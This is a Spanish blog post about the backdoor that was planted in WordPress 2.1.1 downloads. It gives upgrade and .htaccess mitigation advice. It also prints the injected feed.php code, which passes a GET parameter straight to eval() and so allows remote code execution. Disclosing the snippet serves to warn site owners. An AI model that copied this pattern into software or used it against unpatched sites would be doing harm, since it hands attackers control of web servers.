Actualización de seguridad para WordPress 2.1.1

Si has descargado e instalado la versión 2.1.1 de wordpress durante la última semana que sepas que tienes un pequeño problema que resolver. Algo así es lo que dicen en su blog oficial. Por lo visto un cracker ha tenido acceso al código de esta versión durante los últimos días y ha introducido en el mismo unas líneas que permiten la ejecución arbitraria de código de forma remota, concretamente en los ficheros feed.php y theme.php.

Para los curiosos, en buayacorp nos muestran el código introducido en el fichero feed.php:

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}

...

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

La solución pasa por dar la mayor difusión a la noticia (para los despistados que no lean las notas que wordpress publica en su tablero inicial), actualizar lo antes posible a la nueva versión 2.1.2 que corrige este y, «poyaque» estamos, otros problemas o si no te es posible esto último usar la solución alternativa que sugieren en el blog de dreamhost e introducir las siguientes reglas de bloqueo en el fichero .htaccess de tu apache:

< Files theme.php >
order allow,deny
deny from all
< /Files >

< Files feed.php >
order allow,deny
deny from all
< /Files >